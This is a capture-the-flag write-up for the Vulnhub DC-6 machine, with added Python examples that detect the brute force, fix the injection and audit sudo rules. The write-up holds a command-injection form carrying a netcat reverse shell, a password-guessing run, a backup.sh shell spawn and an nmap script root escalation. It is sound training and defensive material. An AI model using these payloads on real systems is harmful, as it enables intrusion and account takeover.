DC:6

Last updated 3 years ago

DC-6 is an easy, OSCP-preparation machine from Vulnhub. I have enjoyed the process of manual exploitation.

The developer of this machine added some instructions and hints in the Vulnhub description. First, add the IP to your /etc/hosts file. The other one is a hint for the password attack:

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
That should save you a few years. ;-)

Network Scanning:

1. To start the attack, we need the target's IP address, so I have used Netdiscover:

netdiscover -i eth0 -r 10.0.2.0/24

Target IP: 10.0.2.8

2. Before attacking, it's a good strategy to scan all ports. Rustscan is a very fast scanner for this job:

rustscan -a 10.0.2.8 --range 1-65535

Output:

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64

There are 2 ports open. An Nmap scan of those ports now shows some more information:

nmap -sS -sV -O -p 22,80 -v 10.0.2.8

Output:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))

Enumeration:

I have added the IP to my /etc/hosts as wordy.

3. There is a web service running on port 80. The site says it's a WordPress site.

Wpscan is perfect for scanning this site:

wpscan --url http://wordy/ --enumerate

Output:

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 
[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
 | Found By: Rss Generator (Passive Detection)

[+] WordPress theme in use: twentyseventeen
 | Location: http://wordy/wp-content/themes/twentyseventeen/
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.8
 | Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
 | Style Name: Twenty Seventeen

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

From the scan output I can get some usernames, and with the Vulnhub hint I have a password list as well. So scanning with credentials shows some more info:

wpscan -U user.txt -P PASS_DC.txt --url http://wordy/

Output (login credential found):

[!] Valid Combinations Found:
 | Username: mark, Password: helpdesk01

I can log in with this username and password.
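Seen from the server side, as an added example that is not part of the original writeup: the user enumeration (author-ID probing, the wp-json users listing) and the credential run against wp-login.php both leave a distinctive trail in the web server's access log. The Python below parses constructed Apache combined-log lines and flags a source that enumerates users, bursts failed logins, or gets a redirect right after such a burst (WordPress answers a failed login by re-rendering the form with HTTP 200 and a successful one with a 302). The log lines, addresses, thresholds and the WPScan user-agent string are all constructed for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-log excerpt (sample data, not taken from the page):
# one source runs an author-ID sweep, hits the wp-json users endpoint, then fires a
# burst of wp-login.php POSTs that ends in a redirect; another source just browses.
SAMPLE_LOG = """\
10.0.2.4 - - [10/May/2021:14:01:50 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "WPScan v3.8.7"
10.0.2.4 - - [10/May/2021:14:01:50 +0000] "GET /?author=2 HTTP/1.1" 301 0 "-" "WPScan v3.8.7"
10.0.2.4 - - [10/May/2021:14:01:51 +0000] "GET /?author=3 HTTP/1.1" 301 0 "-" "WPScan v3.8.7"
10.0.2.4 - - [10/May/2021:14:01:51 +0000] "GET /index.php/wp-json/wp/v2/users/?per_page=100&page=1 HTTP/1.1" 200 1320 "-" "WPScan v3.8.7"
10.0.2.9 - - [10/May/2021:14:02:00 +0000] "GET /index.php/2021/05/hello-world/ HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
10.0.2.4 - - [10/May/2021:14:02:01 +0000] "POST /wp-login.php HTTP/1.1" 200 2311 "-" "WPScan v3.8.7"
10.0.2.4 - - [10/May/2021:14:02:01 +0000] "POST /wp-login.php HTTP/1.1" 200 2311 "-" "WPScan v3.8.7"
10.0.2.4 - - [10/May/2021:14:02:02 +0000] "POST /wp-login.php HTTP/1.1" 200 2311 "-" "WPScan v3.8.7"
10.0.2.4 - - [10/May/2021:14:02:02 +0000] "POST /wp-login.php HTTP/1.1" 200 2311 "-" "WPScan v3.8.7"
10.0.2.4 - - [10/May/2021:14:02:03 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3.8.7"
10.0.2.9 - - [10/May/2021:14:05:10 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Requests that only make sense for user enumeration: author-ID probing and the
# REST users listing that wpscan reported above.
ENUM_RE = re.compile(r'^/\?author=\d+|/wp-json/wp/v2/users')


def parse_line(line):
    """Return the fields of one combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    entry["status"] = int(entry["status"])
    return entry


def max_in_window(times, window):
    """Largest number of timestamps that fall inside any span of `window` seconds."""
    times = sorted(times)
    best = lo = 0
    for hi, t in enumerate(times):
        while (t - times[lo]).total_seconds() > window:
            lo += 1
        best = max(best, hi - lo + 1)
    return best


def analyse(log_text, window=60, threshold=4):
    """Flag sources that enumerate users or hammer wp-login.php.

    A failed WordPress login re-renders the form (HTTP 200); a successful one
    redirects (HTTP 302). A 302 that follows a burst of 200s from the same
    address is the defender's view of "Valid Combinations Found".
    """
    per_ip = defaultdict(lambda: {"fails": [], "posts": [], "enum": 0})
    for line in log_text.splitlines():
        e = parse_line(line)
        if e is None:
            continue
        rec = per_ip[e["ip"]]
        if e["method"] == "POST" and e["path"].startswith("/wp-login.php"):
            rec["posts"].append((e["ts"], e["status"]))
            if e["status"] == 200:
                rec["fails"].append(e["ts"])
        if ENUM_RE.search(e["path"]):
            rec["enum"] += 1

    findings = {}
    for ip, rec in per_ip.items():
        burst = max_in_window(rec["fails"], window)
        guessed = any(
            status == 302
            and sum(1 for t in rec["fails"] if 0 <= (ts - t).total_seconds() <= window) >= threshold
            for ts, status in rec["posts"]
        )
        if burst >= threshold or guessed or rec["enum"] >= 3:
            findings[ip] = {
                "failed_logins_in_window": burst,
                "user_enumeration_requests": rec["enum"],
                "success_after_burst": guessed,
            }
    return findings


if __name__ == "__main__":
    for ip, f in analyse(SAMPLE_LOG).items():
        print(ip, f)
```

Run as a script it prints one line for 10.0.2.4 and nothing for the benign browser; the window and threshold are deliberately small so the eleven constructed lines trigger every rule, and would be tuned up on a real log.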

Exploitation

4. Nothing else of interest turns up on the site. After some exploring, I have found that only the 'Activity Monitor' plugin is running there. A quick Google search shows that an exploit is available for it:

https://www.exploit-db.com/exploits/45274

5. This plugin has a command injection vulnerability. I need to modify the exploit, as my IP and port are different. I have also changed the netcat reverse shell command, because the default command was not working properly. Exploit (save it as .html and run):

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="ip" value="google.fr| nc -e /bin/bash 10.0.2.4 4040" />
      <input type="hidden" name="lookup" value="Lookup" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

6. To get a shell, I have started a listener on my machine, executed the exploit and got a connection:

nc -lvnp 4040

Then I upgraded the shell with python:

python -c 'import pty; pty.spawn("/bin/sh")'

Post Exploitation:

7. After some manual exploration of the available files, I have found a new user credential: graham - GSo7isUM1D4

8. SSH is available, and I can log in as graham.

9. To escalate my privileges, I started manual enumeration. The permission check shows an editable .sh file and a vulnerable Debian version.

10. A local privilege escalation exploit is available for this version:

https://www.exploit-db.com/exploits/41240

11. I can modify the backup.sh file. After modifying it, executing it gives me access as jens:

#!/bin/bash
tar -czf backups.tar.gz /var/www/html
/bin/bash

Executing the script gives a shell as jens, and the permission check for jens shows:

12. Jens can run nmap. To get a root shell, I have tried to run nmap in interactive mode, but it's not available there.

13. Creating an nmap NSE script that executes a shell:

echo 'os.execute("/bin/sh")' > /tmp/root.nse

/tmp is a good place to save a new file, because there is usually no restriction on creating files there, and I can run my nmap script from it. After running the command the terminal does not echo back what I type, so I had to type blindly, and got the root flag.

This was a very good practice of manual exploitation and privilege escalation. Thanks to @DCAU7
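The form in the Exploitation section works for two reasons that are worth seeing in code: the plugin passes the lookup field into a shell command string unchanged, and the admin page accepts a POST that carries no nonce and comes from a foreign origin. The Python below is an added example, not the page's or the plugin's code. It shows the vulnerable string-building pattern beside a hardened version (validate the value as an IP address or hostname, pass it as its own argv element with no shell, or shlex.quote it when a shell string is unavoidable) and a request check of the kind WordPress's wp_nonce_field()/check_admin_referer() provide. The dig-based lookup, the site_host default, the session_nonce parameter and the exact checks are assumptions for the illustration; only the payload string comes from the page.

```python
import hmac
import ipaddress
import re
import shlex
import subprocess
from urllib.parse import urlsplit

# The value the writeup's form submits in the "ip" field (taken from the page).
PAGE_PAYLOAD = "google.fr| nc -e /bin/bash 10.0.2.4 4040"

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens, no
# leading or trailing hyphen, at most 63 chars per label and 253 overall.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}\.?$)(?:(?!-)[A-Za-z0-9-]{1,63}(?<!-)\.)*(?!-)[A-Za-z0-9-]{1,63}(?<!-)\.?$"
)


def build_lookup_unsafe(target):
    """The vulnerable pattern: user input spliced into a shell command string.
    Only built here, never executed; a '|' turns the one command into two."""
    return "dig " + target


def is_valid_lookup_target(value):
    """Accept exactly what a lookup tool needs: an IP address or a hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(value))


def build_lookup_safe(target):
    """Validated input passed as its own argv element, so no shell parses it."""
    if not is_valid_lookup_target(target):
        raise ValueError("lookup target must be an IP address or a hostname")
    return ["dig", "+short", target]


def build_lookup_quoted(target):
    """Fallback when a shell string is unavoidable: quote the value so any shell
    metacharacters in it stay literal (still validate first in real code)."""
    return "dig " + shlex.quote(target)


def run_lookup(target):
    """Run the hardened lookup (needs dig on the host; not exercised by the tests)."""
    return subprocess.run(build_lookup_safe(target), capture_output=True,
                          text=True, timeout=10, check=False).stdout


def request_allowed(form, headers, session_nonce, site_host="wordy"):
    """Reject the auto-submitted cross-site form from the writeup: it carries no
    nonce (wp_nonce_field() would add a '_wpnonce' field) and arrives from a
    foreign Origin. Assumes the server knows the nonce issued to this session."""
    nonce_ok = hmac.compare_digest(form.get("_wpnonce", ""), session_nonce)
    origin = headers.get("Origin") or headers.get("Referer") or ""
    return nonce_ok and urlsplit(origin).hostname == site_host


if __name__ == "__main__":
    print("unsafe :", build_lookup_unsafe(PAGE_PAYLOAD))
    print("quoted :", build_lookup_quoted(PAGE_PAYLOAD))
    print("valid? :", is_valid_lookup_target(PAGE_PAYLOAD))
    print("argv   :", build_lookup_safe("google.fr"))
```

The two defences are independent: the argv form removes the shell from the picture even if validation is later weakened, and the nonce/origin check stops the page-driven submission even where the command is built correctly.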
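Steps 9 to 13 chain two sudo mistakes: a script that one user may run as another but that the first user can edit, and a binary (nmap) whose scripting engine can spawn a shell. As an added audit example, not the page's own code, the Python below parses a constructed sudoers fragment, checks whether the invoking user can write each command file or the directory holding it, and flags shell-capable binaries; demo() builds a throwaway layout in a temp directory that mirrors the writeup (a world-writable backup.sh runnable as jens, an nmap stand-in runnable as root) with constructed user IDs. The file paths, the IDs and the short SHELL_CAPABLE list are assumptions; on a real host the identities would come from pwd/grp and the rules from /etc/sudoers and sudoers.d.

```python
import os
import re
import shutil
import stat
import tempfile

# Binaries that hand the caller a shell when run through sudo: nmap because its
# NSE scripts are Lua with os.execute() available (the writeup's step 13), plus
# plain interpreters. Assumption: this short list stands in for a full catalogue.
SHELL_CAPABLE = frozenset({"nmap", "sh", "bash", "dash", "python", "python3", "perl"})

# One sudoers rule: "user host=(runas) [TAG:] cmd[, cmd...]". Defaults, aliases
# and #include lines are ignored by this parser.
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Return one dict per command in each user rule of a sudoers fragment."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = RULE_RE.match(line) if line else None
        if not m:
            continue
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            rules.append({"user": m["user"], "runas": m["runas"],
                          "nopasswd": "NOPASSWD:" in m["tags"],
                          "command": cmd, "path": cmd.split()[0]})
    return rules


def writable_by(path, uid, gids):
    """True when an account with this uid and group set may write `path`."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    m = st.st_mode
    return bool((st.st_uid == uid and m & stat.S_IWUSR)
                or (st.st_gid in gids and m & stat.S_IWGRP)
                or m & stat.S_IWOTH)


def audit(sudoers_text, identities):
    """Return (user, command, reason) for every risky rule.

    identities maps username -> (uid, {gids}). A rule is risky if its binary can
    spawn a shell, or if the invoking user can write the command file or its
    parent directory (a writable directory lets the file be replaced wholesale).
    """
    findings = []
    for r in parse_sudoers(sudoers_text):
        if os.path.basename(r["path"]) in SHELL_CAPABLE:
            findings.append((r["user"], r["command"],
                             "shell-capable binary runs as %s" % r["runas"]))
        uid, gids = identities.get(r["user"], (None, set()))
        if uid is None:
            continue
        for p in (r["path"], os.path.dirname(r["path"])):
            if writable_by(p, uid, gids):
                findings.append((r["user"], r["command"],
                                 "%s is writable by %s" % (p, r["user"])))
                break
    return findings


def demo():
    """Throwaway layout mirroring the writeup: a world-writable backup script that
    graham may run as jens, and an nmap stand-in that jens may run as root."""
    tmp = tempfile.mkdtemp()
    try:
        script = os.path.join(tmp, "backup.sh")
        with open(script, "w") as fh:
            fh.write("#!/bin/bash\ntar -czf backups.tar.gz /var/www/html\n")
        os.chmod(script, 0o777)            # the defect: anyone may edit what jens executes
        nmap = os.path.join(tmp, "nmap")   # stands in for /usr/bin/nmap, mode 755
        open(nmap, "w").close()
        os.chmod(nmap, 0o755)
        sudoers = ("# constructed fragment, not the machine's real /etc/sudoers\n"
                   "graham  ALL=(jens) NOPASSWD: %s\n"
                   "jens    ALL=(root) NOPASSWD: %s\n" % (script, nmap))
        # constructed ids, offset so they never collide with the account running this
        u, g = os.getuid(), os.getgid()
        identities = {"graham": (u + 1001, {g + 1001}), "jens": (u + 1002, {g + 1002})}
        return audit(sudoers, identities)
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    for user, command, reason in demo():
        print("%-7s %-40s %s" % (user, command, reason))
```

The fix on the host side is the mirror image of the findings: make the script root-owned and 0755 (or 0700) and give jens a rule for a wrapper that cannot run arbitrary programs instead of nmap itself.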